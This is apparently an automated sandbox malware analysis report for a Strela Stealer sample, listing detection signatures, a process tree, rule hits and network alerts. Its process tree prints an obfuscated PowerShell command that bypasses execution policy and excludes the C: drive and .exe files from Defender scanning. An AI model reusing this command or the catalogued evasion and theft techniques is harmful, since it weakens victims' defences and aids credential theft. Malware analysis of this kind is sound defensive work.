Windows
Analysis Report
SecuriteInfo.com.FileRepMalware.23820.12149.exe
Overview
General Information
Detection
Strela Stealer
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
Yara detected Strela Stealer
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential PowerShell Command Line Obfuscation
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
SecuriteInfo.com.FileRepMalware.23820.12149.exe (PID: 5044 cmdline:
"C:\Users\ user\Deskt op\Securit eInfo.com. FileRepMal ware.23820 .12149.exe " MD5: C4E6239CAD71853AC5330AB665187D9F) powershell.exe (PID: 652 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -w 1 - c ".([char ]65+[char] 100+[char] 100+[char] 45+[char]7 7+[char]11 2+[char]80 +[char]114 +[char]101 +[char]102 +[char]101 +[char]114 +[char]101 +[char]110 +[char]99+ [char]101) -Exclusio nPath ([Ch ar]67+[Cha r]58+[Char ]92);.([ch ar]65+[cha r]100+[cha r]100+[cha r]45+[char ]77+[char] 112+[char] 80+[char]1 14+[char]1 01+[char]1 02+[char]1 01+[char]1 14+[char]1 01+[char]1 10+[char]9 9+[char]10 1) -Exclus ionExtensi on 'exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WmiPrvSE.exe (PID: 6584 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) a.exe (PID: 7908 cmdline:
"C:\Users\ user\AppDa ta\Roaming \a.exe" MD5: 645A45D81803813EC953409B49468E69) chrome.exe (PID: 8024 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --di sable-fre --no-defau lt-browser -check --n o-first-ru n --no-san dbox --all ow-no-sand box-job -- disable-gp u --mute-a udio --dis able-audio --user-da ta-dir="C: \Users\use r\AppData\ Local\Temp \xizov5lf. xxi" MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 1136 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-G B --servic e-sandbox- type=none --no-sandb ox --mute- audio --us er-data-di r="C:\User s\user\App Data\Local \Temp\xizo v5lf.xxi" --no-pre-r ead-main-d ll --field -trial-han dle=2336,i ,943349621 5065290315 ,151685763 1540475379 4,262144 - -variation s-seed-ver sion --moj o-platform -channel-h andle=2416 /prefetch :3 MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 8044 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=crashpa d-handler --user-dat a-dir=C:\U sers\user\ AppData\Lo cal\Temp\x izov5lf.xx i /prefetc h:4 --moni tor-self-a nnotation= ptype=cras hpad-handl er --datab ase=C:\Use rs\user\Ap pData\Loca l\Temp\xiz ov5lf.xxi\ Crashpad - -metrics-d ir=C:\User s\user\App Data\Local \Temp\xizo v5lf.xxi - -url=https ://clients 2.google.c om/cr/repo rt --annot ation=chan nel= --ann otation=pl at=Win64 - -annotatio n=prod=Chr ome --anno tation=ver =134.0.699 8.36 --ini tial-clien t-data=0x1 08,0x10c,0 x110,0xe4, 0x114,0x7f fc9d1d4f38 ,0x7ffc9d1 d4f44,0x7f fc9d1d4f50 MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 3432 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=gpu-pro cess --no- sandbox -- user-data- dir="C:\Us ers\user\A ppData\Loc al\Temp\xi zov5lf.xxi " --no-pre -read-main -dll --gpu -preferenc es=UAAAAAA AAADgAAAEA AAAAAAAAAA AAAAAAABgA AAAAAAAAAA AAAAAAAAAA AACAAAAAAA AAAAAAAAAA AAAAAAAABA AAAAAAAAAE AAAAAAAAAA IAAAAAAAAA AgAAAAAAAA A --use-gl =angle --u se-angle=s wiftshader -webgl --f ield-trial -handle=23 36,i,94334 9621506529 0315,15168 5763154047 53794,2621 44 --varia tions-seed -version - -mojo-plat form-chann el-handle= 2332 /pref etch:2 MD5: E81F54E6C1129887AEA47E7D092680BF) Gelelx.exe (PID: 9184 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Gelelx .exe" MD5: 5648BC0CB4AE58D07BB6C8789C560B1C) Vhbyv.exe (PID: 3152 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Vhbyv. exe" MD5: 922D612E9A3CFEE599C708C68E10A512) Vhbyv.exe (PID: 4032 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Vhbyv. exe" MD5: 922D612E9A3CFEE599C708C68E10A512) Gelelx.exe (PID: 3148 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Gelelx .exe" MD5: 5648BC0CB4AE58D07BB6C8789C560B1C)
svchost.exe (PID: 7208 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
license.exe (PID: 2336 cmdline:
"C:\Users\ user\AppDa ta\Roaming \license.e xe" MD5: 795F83B492C7B77A2C9005144ECCE403) license.exe (PID: 8336 cmdline:
"C:\Users\ user\AppDa ta\Roaming \license.e xe" MD5: 795F83B492C7B77A2C9005144ECCE403)
hosts.exe (PID: 8496 cmdline:
"C:\Users\ user\AppDa ta\Roaming \hosts.exe " MD5: EB1CDECFD9970F668E64DFDBB2FB92C6)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 13 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): |
Source: | Author: frack113: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-07T21:57:03.362111+0100 | 1810003 | 2 | Potentially Bad Traffic | 185.170.144.38 | 80 | 192.168.2.4 | 49714 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-07T21:57:03.362105+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49714 | 185.170.144.38 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 16_2_03331734 | |
Source: | Code function: | 16_2_03331538 | |
Source: | Code function: | 16_2_03331528 | |
Source: | Code function: | 16_2_03336AC7 | |
Source: | Code function: | 16_2_033369E8 | |
Source: | Code function: | 16_2_033369D8 | |
Source: | Code function: | 16_2_03330E00 | |
Source: | Code function: | 16_2_03330DF1 | |
Source: | Code function: | 21_2_02BB1734 | |
Source: | Code function: | 21_2_02BB1538 | |
Source: | Code function: | 21_2_02BB152B | |
Source: | Code function: | 21_2_02BB6AC7 | |
Source: | Code function: | 21_2_02BB69E8 | |
Source: | Code function: | 21_2_02BB69D8 | |
Source: | Code function: | 21_2_02BB0E00 | |
Source: | Code function: | 21_2_02BB0DF1 |
Source: | Memory has grown: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | HTTP traffic detected: |